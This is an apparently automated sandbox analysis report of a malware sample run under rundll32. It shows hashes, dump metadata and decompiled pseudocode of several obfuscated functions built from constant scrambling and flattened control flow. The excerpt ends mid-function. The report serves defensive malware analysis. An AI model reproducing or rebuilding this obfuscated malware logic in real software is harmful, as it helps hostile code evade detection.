                                                                                                                      0x006a0d87
                                                                                                                      0x006a0d94
                                                                                                                      0x006a0d98
                                                                                                                      0x006a0da0
                                                                                                                      0x006a0da8
                                                                                                                      0x006a0da8
                                                                                                                      0x006a0db6
                                                                                                                      0x006a0e2e
                                                                                                                      0x006a0db8
                                                                                                                      0x006a0dbe
                                                                                                                      0x006a0df2
                                                                                                                      0x006a0df6
                                                                                                                      0x006a0dfb
                                                                                                                      0x006a0dfe
                                                                                                                      0x006a0e03
                                                                                                                      0x00000000
                                                                                                                      0x006a0dc0
                                                                                                                      0x006a0dc2
                                                                                                                      0x00000000
                                                                                                                      0x006a0dc4
                                                                                                                      0x006a0dd0
                                                                                                                      0x006a0dd1
                                                                                                                      0x006a0dd2
                                                                                                                      0x006a0dd7
                                                                                                                      0x006a0dda
                                                                                                                      0x006a0ddf
                                                                                                                      0x00000000
                                                                                                                      0x006a0ddf
                                                                                                                      0x006a0dc2
                                                                                                                      0x006a0dbe
                                                                                                                      0x006a0e30
                                                                                                                      0x006a0e39
                                                                                                                      0x006a0e39
                                                                                                                      0x006a0e07
                                                                                                                      0x006a0e09
                                                                                                                      0x006a0e09
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 9^xu$fj$im
                                                                                                                      • API String ID: 0-3261451082
                                                                                                                      • Opcode ID: 18b3828217514bbcca6388c8ecba237d954a44b53edf24ff878c84fc7e148a74
                                                                                                                      • Instruction ID: 19718ecb63837919f6b6b08f573e6b74216a10be3848e479fad97c190714b218
                                                                                                                      • Opcode Fuzzy Hash: 18b3828217514bbcca6388c8ecba237d954a44b53edf24ff878c84fc7e148a74
                                                                                                                      • Instruction Fuzzy Hash: AB5156B24083429FD784DF25D48544BBBE1BFD8368F501A1DF495A6260D3B4CA49CF87
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00696C49 Relevance: 3.9, Strings: 3, Instructions: 104COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 90%
                                                                                                                      			E00696C49(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				intOrPtr _v56;
				char _v88;
				char _v608;
				void* _t92;
				void* _t96;
				void* _t101;
				void* _t112;
				void* _t113;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E006920B9(_t92);
				_v52 = _v52 & 0x00000000;
				_v56 = 0x878462;
				_t113 = _t112 + 0x14;
				_v32 = 0x956791;
				_t101 = 0x1300659;
				_v32 = _v32 + 0xffff68af;
				_v32 = _v32 ^ 0x0094d050;
				_v48 = 0xb6c679;
				_v48 = _v48 * 9;
				_v48 = _v48 ^ 0x0662f925;
				_v16 = 0xd9c762;
				_v16 = _v16 << 1;
				_v16 = _v16 | 0xb4c78449;
				_v16 = _v16 ^ 0xb5f30401;
				_v40 = 0x8b331e;
				_v40 = _v40 >> 0xc;
				_v40 = _v40 ^ 0x000c5129;
				_v28 = 0x1269f4;
				_v28 = _v28 >> 4;
				_v28 = _v28 ^ 0x0007e996;
				_v44 = 0xabd705;
				_v44 = _v44 ^ 0x9c90d177;
				_v44 = _v44 ^ 0x9c3fe788;
				_v8 = 0x357d72;
				_v8 = _v8 + 0xd90c;
				_v8 = _v8 ^ 0xccfdbdcb;
				_v8 = _v8 >> 3;
				_v8 = _v8 ^ 0x199e890f;
				_v12 = 0x32e6;
				_v12 = _v12 ^ 0x74a35607;
				_v12 = _v12 | 0x704b9008;
				_v12 = _v12 + 0xffff83aa;
				_v12 = _v12 ^ 0x74eee325;
				_v36 = 0xeddfb6;
				_v36 = _v36 << 0xa;
				_v36 = _v36 ^ 0xb77b8cf2;
				_v24 = 0xe2b758;
				_v24 = _v24 << 5;
				_v24 = _v24 * 0x38;
				_v24 = _v24 ^ 0x330719f5;
				_v20 = 0x9236d6;
				_v20 = _v20 | 0x3f0523f5;
				_v20 = _v20 >> 0xd;
				_v20 = _v20 ^ 0x000835ca;
				do {
					while(_t101 != 0x1300659) {
						if(_t101 == 0xa264c44) {
							_t96 = E00689D31(_v40,  &_v608, _v28, _t101, _v44, _v8);
							_t113 = _t113 + 0x10;
							_t101 = 0xbcabc0e;
							continue;
						}
						if(_t101 != 0xbcabc0e) {
							goto L8;
						}
						return E00696637( &_v88, _v12, _v36, _v24,  &_v608, _a12, _v20);
					}
					_t96 = E00684B61( &_v88, _v32, _v48, _v16);
					_t101 = 0xa264c44;
					L8:
				} while (_t101 != 0x478adce);
				return _t96;
			}























                                                                                                                      0x00696c55
                                                                                                                      0x00696c58
                                                                                                                      0x00696c5b
                                                                                                                      0x00696c5e
                                                                                                                      0x00696c5f
                                                                                                                      0x00696c60
                                                                                                                      0x00696c65
                                                                                                                      0x00696c6e
                                                                                                                      0x00696c75
                                                                                                                      0x00696c78
                                                                                                                      0x00696c7f
                                                                                                                      0x00696c81
                                                                                                                      0x00696c8d
                                                                                                                      0x00696c99
                                                                                                                      0x00696ca4
                                                                                                                      0x00696ca7
                                                                                                                      0x00696cae
                                                                                                                      0x00696cb5
                                                                                                                      0x00696cb8
                                                                                                                      0x00696cbf
                                                                                                                      0x00696cc6
                                                                                                                      0x00696ccd
                                                                                                                      0x00696cd1
                                                                                                                      0x00696cd8
                                                                                                                      0x00696cdf
                                                                                                                      0x00696ce3
                                                                                                                      0x00696cea
                                                                                                                      0x00696cf1
                                                                                                                      0x00696cf8
                                                                                                                      0x00696cff
                                                                                                                      0x00696d06
                                                                                                                      0x00696d0d
                                                                                                                      0x00696d14
                                                                                                                      0x00696d18
                                                                                                                      0x00696d1f
                                                                                                                      0x00696d26
                                                                                                                      0x00696d2d
                                                                                                                      0x00696d34
                                                                                                                      0x00696d3b
                                                                                                                      0x00696d42
                                                                                                                      0x00696d49
                                                                                                                      0x00696d4d
                                                                                                                      0x00696d54
                                                                                                                      0x00696d5b
                                                                                                                      0x00696d63
                                                                                                                      0x00696d66
                                                                                                                      0x00696d6d
                                                                                                                      0x00696d74
                                                                                                                      0x00696d7b
                                                                                                                      0x00696d7f
                                                                                                                      0x00696d86
                                                                                                                      0x00696d86
                                                                                                                      0x00696d8c
                                                                                                                      0x00696dcd
                                                                                                                      0x00696dd2
                                                                                                                      0x00696dd5
                                                                                                                      0x00000000
                                                                                                                      0x00696dd5
                                                                                                                      0x00696d90
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00696db0
                                                                                                                      0x00696de5
                                                                                                                      0x00696dec
                                                                                                                      0x00696dee
                                                                                                                      0x00696dee
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: %t$DL&$r}5
                                                                                                                      • API String ID: 0-2337153543
                                                                                                                      • Opcode ID: 7dbbebab4da4aa2abdde95fd686c9ed2a692aafdb7a56fb7eb10c47b438e4e0c
                                                                                                                      • Instruction ID: 5bd5b68feaf558fab646d8909013fc408c82148fe4ea0e8ff37a6d5b24430373
                                                                                                                      • Opcode Fuzzy Hash: 7dbbebab4da4aa2abdde95fd686c9ed2a692aafdb7a56fb7eb10c47b438e4e0c
                                                                                                                      • Instruction Fuzzy Hash: 33412371D0020EABCF09DFE1D94A4EEBBB6FF48318F208199D51176260D3B54A59CFA9
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 1003B8BC Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • __decode_pointer.LIBCMT ref: 1003B8CA
                                                                                                                        • Part of subcall function 100350AE: TlsGetValue.KERNEL32 ref: 100350BB
                                                                                                                        • Part of subcall function 100350AE: TlsGetValue.KERNEL32 ref: 100350D2
                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32 ref: 1003B8D1
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Value$ExceptionFilterUnhandled__decode_pointer
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1958600898-0
                                                                                                                      • Opcode ID: 5a11b17b52fb02af9bc6982e0ec44a7269600518a9b7aa9640256876448a332b
                                                                                                                      • Instruction ID: 13914855b6ed5f75d6cf868945e622cc1528c9e1cf50f9ea13f0b817109926cd
                                                                                                                      • Opcode Fuzzy Hash: 5a11b17b52fb02af9bc6982e0ec44a7269600518a9b7aa9640256876448a332b
                                                                                                                      • Instruction Fuzzy Hash: 7FC08C388087C04FEB1AD3354D8C30D3E00E713301FC00488DC80D5053EE99410C8323
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 00691889 Relevance: 2.8, Strings: 2, Instructions: 278COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 93%
                                                                                                                      			E00691889(void* __ecx) {
				char _v520;
				char _v1040;
				char _v1560;
				short _v1564;
				intOrPtr _v1568;
				signed int _v1572;
				signed int _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _t323;
				signed int _t334;
				signed int _t337;
				signed int _t338;
				signed int _t339;
				signed int _t340;
				signed int _t341;
				signed int _t342;
				signed int _t343;
				signed int _t344;
				signed int _t345;
				signed int _t346;
				void* _t386;
				void* _t387;
				signed int* _t390;

				_t390 =  &_v1680;
				_v1568 = 0xdfec4c;
				_t386 = __ecx;
				_v1564 = 0;
				_t387 = 0xea1969c;
				_v1596 = 0xb94d4f;
				_v1596 = _v1596 >> 2;
				_v1596 = _v1596 ^ 0x002b88ba;
				_v1604 = 0x7820e8;
				_t9 =  &_v1604; // 0x7820e8
				_t337 = 0x3f;
				_v1604 =  *_t9 / _t337;
				_v1604 = _v1604 << 6;
				_v1604 = _v1604 ^ 0x0075b154;
				_v1676 = 0xd796f6;
				_v1676 = _v1676 << 7;
				_t338 = 0x1f;
				_v1676 = _v1676 / _t338;
				_v1676 = _v1676 | 0x34dfec15;
				_v1676 = _v1676 ^ 0x37fcd475;
				_v1580 = 0x701ced;
				_t339 = 0x3b;
				_v1580 = _v1580 / _t339;
				_v1580 = _v1580 ^ 0x000eda5b;
				_v1584 = 0x3864f;
				_v1584 = _v1584 | 0xebab6106;
				_v1584 = _v1584 ^ 0xeba3c8dc;
				_v1668 = 0x7d6229;
				_v1668 = _v1668 + 0x90f9;
				_t340 = 0x7d;
				_v1668 = _v1668 * 0xd;
				_v1668 = _v1668 + 0x17d6;
				_v1668 = _v1668 ^ 0x06671cb6;
				_v1652 = 0x8dafad;
				_v1652 = _v1652 + 0xffffa237;
				_v1652 = _v1652 / _t340;
				_v1652 = _v1652 ^ 0xeab94c45;
				_v1652 = _v1652 ^ 0xeabb4144;
				_v1620 = 0x364acf;
				_v1620 = _v1620 + 0xffffd559;
				_v1620 = _v1620 ^ 0x476b0832;
				_v1620 = _v1620 ^ 0x4757dcec;
				_v1660 = 0xdffac8;
				_v1660 = _v1660 | 0xd3f81aab;
				_t341 = 0xd;
				_v1660 = _v1660 / _t341;
				_v1660 = _v1660 + 0x2ca8;
				_v1660 = _v1660 ^ 0x10473906;
				_v1636 = 0xafa95;
				_v1636 = _v1636 | 0x12b9adda;
				_v1636 = _v1636 + 0xca30;
				_t342 = 0x24;
				_v1636 = _v1636 / _t342;
				_v1636 = _v1636 ^ 0x008bc8e6;
				_v1612 = 0xa1b06d;
				_v1612 = _v1612 ^ 0xd927b519;
				_t334 = 0x1c;
				_v1612 = _v1612 / _t334;
				_v1612 = _v1612 ^ 0x07c55aff;
				_v1628 = 0xe475d7;
				_v1628 = _v1628 + 0xf351;
				_v1628 = _v1628 >> 9;
				_v1628 = _v1628 ^ 0x000b149a;
				_v1644 = 0xc98f78;
				_v1644 = _v1644 + 0xa497;
				_v1644 = _v1644 + 0xab0a;
				_v1644 = _v1644 ^ 0x9916dffd;
				_v1644 = _v1644 ^ 0x99d32d23;
				_v1572 = 0xdb2c8b;
				_v1572 = _v1572 ^ 0xa2354bd4;
				_v1572 = _v1572 ^ 0xa2e9b3f6;
				_v1616 = 0x8ac290;
				_v1616 = _v1616 | 0xd6340cba;
				_t343 = 0x17;
				_v1616 = _v1616 / _t343;
				_v1616 = _v1616 ^ 0x095403ec;
				_v1624 = 0xc9b33;
				_v1624 = _v1624 | 0xadec2c36;
				_t344 = 0x23;
				_v1624 = _v1624 / _t344;
				_v1624 = _v1624 ^ 0x04f29945;
				_v1672 = 0xce6284;
				_t345 = 0x1b;
				_v1672 = _v1672 * 0x47;
				_v1672 = _v1672 >> 0xb;
				_v1672 = _v1672 | 0xab5418c0;
				_v1672 = _v1672 ^ 0xab589207;
				_v1680 = 0xfb4294;
				_v1680 = _v1680 * 0x56;
				_v1680 = _v1680 >> 0xe;
				_v1680 = _v1680 >> 4;
				_v1680 = _v1680 ^ 0x000a896c;
				_v1576 = 0xa0fe48;
				_v1576 = _v1576 / _t345;
				_v1576 = _v1576 ^ 0x000b8e8e;
				_v1608 = 0x915f33;
				_v1608 = _v1608 + 0xfa43;
				_v1608 = _v1608 >> 0xc;
				_v1608 = _v1608 ^ 0x000a30cc;
				_v1648 = 0x21b71b;
				_v1648 = _v1648 ^ 0x78ef874e;
				_v1648 = _v1648 | 0x9c246086;
				_v1648 = _v1648 * 0x4a;
				_v1648 = _v1648 ^ 0x1ce73be6;
				_v1592 = 0x926794;
				_v1592 = _v1592 + 0xffff6f6e;
				_v1592 = _v1592 ^ 0x009c0ed2;
				_v1656 = 0x919083;
				_v1656 = _v1656 / _t334;
				_v1656 = _v1656 >> 2;
				_t346 = 0x67;
				_v1656 = _v1656 / _t346;
				_v1656 = _v1656 ^ 0x0003c4fa;
				_v1664 = 0xb12839;
				_v1664 = _v1664 ^ 0xbcb8295e;
				_v1664 = _v1664 + 0xe70b;
				_v1664 = _v1664 + 0xffffbcc9;
				_v1664 = _v1664 ^ 0xbc0a928f;
				_v1600 = 0x37ff42;
				_v1600 = _v1600 + 0xffff03fd;
				_v1600 = _v1600 >> 3;
				_v1600 = _v1600 ^ 0x000f4750;
				_v1632 = 0xbb4856;
				_v1632 = _v1632 * 0x4e;
				_v1632 = _v1632 | 0xf74fdfff;
				_v1632 = _v1632 ^ 0xff54b7ec;
				_v1640 = 0x73c8d7;
				_v1640 = _v1640 * 0x56;
				_v1640 = _v1640 << 0xb;
				_v1640 = _v1640 >> 7;
				_v1640 = _v1640 ^ 0x005dc3ee;
				_v1588 = 0xe2f656;
				_t323 = _v1588 * 0x57;
				_v1588 = _t323;
				_v1588 = _v1588 ^ 0x4d200bca;
				while(_t387 != 0x5de06da) {
					if(_t387 == 0xea1969c) {
						_t387 = 0xfa9128f;
						continue;
					} else {
						_t395 = _t387 - 0xfa9128f;
						if(_t387 != 0xfa9128f) {
							L8:
							__eflags = _t387 - 0xa8e801c;
							if(__eflags != 0) {
								continue;
							}
						} else {
							E0069DA22(_v1596, _v1604, _t395, _v1676,  &_v1040, _t346, _v1580);
							 *((short*)(E0068B6CF( &_v1040, _v1584, _v1668, _v1652))) = 0;
							E00688969(_v1620,  &_v520, _t395, _v1660, _v1636);
							_push(_v1644);
							_push(_v1628);
							E006847CE( &_v1040, _v1572, _v1612, _v1616, _v1624, E0069DCF7(_v1612, 0x681328, _t395),  &_v520, _v1672, _v1680);
							E0068A8B0(_v1576, _t329, _v1608);
							_t346 = _v1648;
							_t323 = E0068EA99(_t346, _t386, _v1592, _v1656,  &_v1560, _v1664);
							_t390 =  &(_t390[0x17]);
							if(_t323 != 0) {
								_t387 = 0x5de06da;
								continue;
							}
						}
					}
					return _t323;
				}
				_push(_v1588);
				_push( &_v1560);
				_push(_t346);
				_push(0);
				_push(0);
				_push(_v1640);
				_t346 = _v1600;
				_push(0);
				_t323 = E0068AB87(_t346, _v1632, __eflags);
				_t390 =  &(_t390[7]);
				_t387 = 0xa8e801c;
				goto L8;
			}



















































                                                                                                                      0x00691889
                                                                                                                      0x0069188f
                                                                                                                      0x006918a1
                                                                                                                      0x006918a3
                                                                                                                      0x006918aa
                                                                                                                      0x006918af
                                                                                                                      0x006918b7
                                                                                                                      0x006918bc
                                                                                                                      0x006918c4
                                                                                                                      0x006918cc
                                                                                                                      0x006918d0
                                                                                                                      0x006918d5
                                                                                                                      0x006918db
                                                                                                                      0x006918e0
                                                                                                                      0x006918e8
                                                                                                                      0x006918f0
                                                                                                                      0x006918f9
                                                                                                                      0x006918fe
                                                                                                                      0x00691904
                                                                                                                      0x0069190c
                                                                                                                      0x00691914
                                                                                                                      0x00691920
                                                                                                                      0x00691925
                                                                                                                      0x0069192b
                                                                                                                      0x00691933
                                                                                                                      0x0069193b
                                                                                                                      0x00691943
                                                                                                                      0x0069194b
                                                                                                                      0x00691953
                                                                                                                      0x00691960
                                                                                                                      0x00691963
                                                                                                                      0x00691967
                                                                                                                      0x0069196f
                                                                                                                      0x00691977
                                                                                                                      0x0069197f
                                                                                                                      0x0069198f
                                                                                                                      0x00691993
                                                                                                                      0x0069199b
                                                                                                                      0x006919a3
                                                                                                                      0x006919ab
                                                                                                                      0x006919b3
                                                                                                                      0x006919bb
                                                                                                                      0x006919c3
                                                                                                                      0x006919cb
                                                                                                                      0x006919d7
                                                                                                                      0x006919dc
                                                                                                                      0x006919e2
                                                                                                                      0x006919ea
                                                                                                                      0x006919f2
                                                                                                                      0x006919fa
                                                                                                                      0x00691a02
                                                                                                                      0x00691a0e
                                                                                                                      0x00691a11
                                                                                                                      0x00691a15
                                                                                                                      0x00691a1f
                                                                                                                      0x00691a27
                                                                                                                      0x00691a35
                                                                                                                      0x00691a3a
                                                                                                                      0x00691a3e
                                                                                                                      0x00691a46
                                                                                                                      0x00691a4e
                                                                                                                      0x00691a56
                                                                                                                      0x00691a5b
                                                                                                                      0x00691a63
                                                                                                                      0x00691a6b
                                                                                                                      0x00691a73
                                                                                                                      0x00691a7b
                                                                                                                      0x00691a83
                                                                                                                      0x00691a8b
                                                                                                                      0x00691a93
                                                                                                                      0x00691a9b
                                                                                                                      0x00691aa3
                                                                                                                      0x00691aab
                                                                                                                      0x00691ab9
                                                                                                                      0x00691abe
                                                                                                                      0x00691ac2
                                                                                                                      0x00691aca
                                                                                                                      0x00691ad2
                                                                                                                      0x00691ae0
                                                                                                                      0x00691ae5
                                                                                                                      0x00691ae9
                                                                                                                      0x00691af1
                                                                                                                      0x00691b00
                                                                                                                      0x00691b01
                                                                                                                      0x00691b05
                                                                                                                      0x00691b0a
                                                                                                                      0x00691b12
                                                                                                                      0x00691b1a
                                                                                                                      0x00691b27
                                                                                                                      0x00691b2b
                                                                                                                      0x00691b30
                                                                                                                      0x00691b35
                                                                                                                      0x00691b3d
                                                                                                                      0x00691b4d
                                                                                                                      0x00691b51
                                                                                                                      0x00691b59
                                                                                                                      0x00691b61
                                                                                                                      0x00691b69
                                                                                                                      0x00691b6e
                                                                                                                      0x00691b76
                                                                                                                      0x00691b7e
                                                                                                                      0x00691b86
                                                                                                                      0x00691b93
                                                                                                                      0x00691b97
                                                                                                                      0x00691b9f
                                                                                                                      0x00691ba7
                                                                                                                      0x00691baf
                                                                                                                      0x00691bb7
                                                                                                                      0x00691bc5
                                                                                                                      0x00691bc9
                                                                                                                      0x00691bd6
                                                                                                                      0x00691bde
                                                                                                                      0x00691be2
                                                                                                                      0x00691bea
                                                                                                                      0x00691bf2
                                                                                                                      0x00691bfa
                                                                                                                      0x00691c02
                                                                                                                      0x00691c0a
                                                                                                                      0x00691c12
                                                                                                                      0x00691c1a
                                                                                                                      0x00691c22
                                                                                                                      0x00691c27
                                                                                                                      0x00691c2f
                                                                                                                      0x00691c3c
                                                                                                                      0x00691c40
                                                                                                                      0x00691c48
                                                                                                                      0x00691c50
                                                                                                                      0x00691c5d
                                                                                                                      0x00691c61
                                                                                                                      0x00691c66
                                                                                                                      0x00691c6b
                                                                                                                      0x00691c73
                                                                                                                      0x00691c7b
                                                                                                                      0x00691c80
                                                                                                                      0x00691c84
                                                                                                                      0x00691c8c
                                                                                                                      0x00691c9a
                                                                                                                      0x00691d93
                                                                                                                      0x00000000
                                                                                                                      0x00691ca0
                                                                                                                      0x00691ca0
                                                                                                                      0x00691ca6
                                                                                                                      0x00691dc6
                                                                                                                      0x00691dc6
                                                                                                                      0x00691dcc
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00691cac
                                                                                                                      0x00691cc5
                                                                                                                      0x00691cf6
                                                                                                                      0x00691cfd
                                                                                                                      0x00691d02
                                                                                                                      0x00691d0b
                                                                                                                      0x00691d4c
                                                                                                                      0x00691d5e
                                                                                                                      0x00691d7c
                                                                                                                      0x00691d80
                                                                                                                      0x00691d85
                                                                                                                      0x00691d8a
                                                                                                                      0x00691d8c
                                                                                                                      0x00000000
                                                                                                                      0x00691d8c
                                                                                                                      0x00691d8a
                                                                                                                      0x00691ca6
                                                                                                                      0x00691ddc
                                                                                                                      0x00691ddc
                                                                                                                      0x00691d9d
                                                                                                                      0x00691da8
                                                                                                                      0x00691da9
                                                                                                                      0x00691daa
                                                                                                                      0x00691dab
                                                                                                                      0x00691dac
                                                                                                                      0x00691db4
                                                                                                                      0x00691db8
                                                                                                                      0x00691db9
                                                                                                                      0x00691dbe
                                                                                                                      0x00691dc1
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: )b}$ x
                                                                                                                      • API String ID: 0-2724122486
                                                                                                                      • Opcode ID: 062b5547c4f4c6c4ac27c3abfd508c7440d9e95871469c233638e6607a283a24
                                                                                                                      • Instruction ID: 2f84ae0932499361f6de38ce0e55b379341f78b21c0acf0f3c61504d4f46212c
                                                                                                                      • Opcode Fuzzy Hash: 062b5547c4f4c6c4ac27c3abfd508c7440d9e95871469c233638e6607a283a24
                                                                                                                      • Instruction Fuzzy Hash: 64D122715083819FE368CF60C48A95BFBE2FFC5358F108A1DF1999A260D7B58949CF46
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0069473C Relevance: 2.7, Strings: 2, Instructions: 233COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 99%
                                                                                                                      			E0069473C() {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				void* _t218;
				signed int _t219;
				void* _t225;
				void* _t246;
				intOrPtr _t251;
				signed int _t252;
				signed int _t253;
				signed int _t254;
				signed int _t255;
				signed int _t256;
				signed int _t257;
				intOrPtr _t258;
				intOrPtr* _t259;
				signed int _t260;
				signed int* _t261;

				_t261 =  &_v100;
				_v12 = 0xf244e3;
				_v8 = 0x291d6d;
				_t225 = 0x37f2dd7;
				_t251 = 0;
				_v4 = 0;
				_v68 = 0x555e8d;
				_v68 = _v68 + 0xfffff532;
				_v68 = _v68 | 0x235b50f0;
				_v68 = _v68 ^ 0x235e53ff;
				_v84 = 0xf72ec;
				_v84 = _v84 >> 7;
				_t252 = 0x19;
				_v84 = _v84 / _t252;
				_v84 = _v84 << 3;
				_v84 = _v84 ^ 0x000f09df;
				_v20 = 0xee8389;
				_t253 = 0x51;
				_v20 = _v20 * 0x29;
				_v20 = _v20 ^ 0x2635dc09;
				_v88 = 0xea545e;
				_t30 =  &_v88; // 0xea545e
				_v88 =  *_t30 / _t253;
				_t36 =  &_v88; // 0xea545e
				_t254 = 0x7a;
				_v88 =  *_t36 * 0x1c;
				_v88 = _v88 + 0xc9a8;
				_v88 = _v88 ^ 0x005db592;
				_v24 = 0x448750;
				_v24 = _v24 / _t254;
				_v24 = _v24 ^ 0x000cab3c;
				_v28 = 0x8cea36;
				_v28 = _v28 * 0x38;
				_v28 = _v28 ^ 0x1eda9ad9;
				_v100 = 0x8110ba;
				_v100 = _v100 + 0x3ab9;
				_v100 = _v100 ^ 0x336ca884;
				_v100 = _v100 + 0xffff8c66;
				_v100 = _v100 ^ 0x33e0711c;
				_v64 = 0x5ca85e;
				_v64 = _v64 >> 0x10;
				_v64 = _v64 * 0x4e;
				_v64 = _v64 ^ 0x000b11ab;
				_v44 = 0x2bb2b6;
				_v44 = _v44 | 0xbbfbcd5f;
				_v44 = _v44 ^ 0xbbf16182;
				_v72 = 0x855f4c;
				_v72 = _v72 ^ 0x87656771;
				_v72 = _v72 * 0x71;
				_v72 = _v72 ^ 0xf9f8e59a;
				_v96 = 0x938339;
				_v96 = _v96 << 8;
				_v96 = _v96 << 0xf;
				_v96 = _v96 ^ 0xcc040e17;
				_v96 = _v96 ^ 0x50841052;
				_v40 = 0xbe1d32;
				_v40 = _v40 + 0x9b9c;
				_v40 = _v40 ^ 0x00bc2d0e;
				_v56 = 0x9e5686;
				_v56 = _v56 + 0xffffd134;
				_v56 = _v56 + 0xffff1440;
				_v56 = _v56 ^ 0x0091c9b6;
				_v60 = 0xb7e614;
				_v60 = _v60 << 3;
				_v60 = _v60 >> 8;
				_v60 = _v60 ^ 0x00065aea;
				_v32 = 0x537989;
				_v32 = _v32 + 0xffff7fce;
				_v32 = _v32 ^ 0x005430a6;
				_v92 = 0x1586eb;
				_t255 = 0x27;
				_v92 = _v92 * 0x18;
				_v92 = _v92 >> 7;
				_v92 = _v92 * 0x26;
				_v92 = _v92 ^ 0x009f543a;
				_v52 = 0xc32f0b;
				_v52 = _v52 | 0xcd8d244f;
				_v52 = _v52 >> 4;
				_v52 = _v52 ^ 0x0cd427c3;
				_v36 = 0xd9cf6a;
				_v36 = _v36 / _t255;
				_v36 = _v36 ^ 0x000f5a1a;
				_v16 = 0xbb623f;
				_v16 = _v16 ^ 0xe760556d;
				_v16 = _v16 ^ 0xe7dfff62;
				_v76 = 0x7fa35c;
				_v76 = _v76 >> 0xa;
				_v76 = _v76 + 0xffff049d;
				_v76 = _v76 ^ 0x38c60922;
				_v76 = _v76 ^ 0xc73f93c8;
				_v80 = 0x34ea16;
				_v80 = _v80 | 0x70dfffff;
				_t256 = 0x78;
				_t257 = _v16;
				_t260 = _v16;
				_t224 = _v16;
				_v80 = _v80 / _t256;
				_v80 = _v80 ^ 0x00f0b2be;
